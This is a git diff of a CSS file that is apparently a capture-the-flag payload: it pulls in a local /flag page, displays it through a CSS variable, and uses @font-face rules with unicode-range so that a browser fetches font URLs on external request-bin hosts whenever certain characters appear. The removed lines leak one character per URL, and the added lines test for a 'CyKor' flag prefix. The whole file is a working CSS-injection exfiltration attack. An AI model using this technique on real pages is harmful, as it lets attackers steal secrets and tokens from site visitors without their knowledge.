--- a/css.css
+++ b/css.css
@@ -1,48 +1,15 @@
 @import url('http://localhost:8080/flag');
 
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=C');
-    unicode-range: U+0043; /* C */
-}
-
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=@');
-    unicode-range: U+0040; /* @ */
-}
-
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=y');
-    unicode-range: U+0079; /* y */
-}
-
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=K');
-    unicode-range: U+004B; /* K */
-}
-
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=o');
-    unicode-range: U+006F; /* o */
-}
-
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=r');
-    unicode-range: U+0072; /* r */
-}
-
-@font-face {
-    font-family: 'LeakFont';
-    src: url('https://vwbekpz.request.dreamhack.games/?leak=brace_open');
-    unicode-range: U+007B; /* { */
+body::after {
+    content: var(--flag);
 }
 
 body::after {
-    content: var(--flag);
-    font-family: 'LeakFont', sans-serif;
+    font-family: 'checkCy';
+}
+
+@font-face {
+    font-family: 'checkCy';
+    src: url('https://poxwbzl.request.dreamhack.games/?flag_start=CyKor');
+    unicode-range: U+0043, U+0079, U+006F, U+004B, U+0072, U+007B; /* C, y */
 }
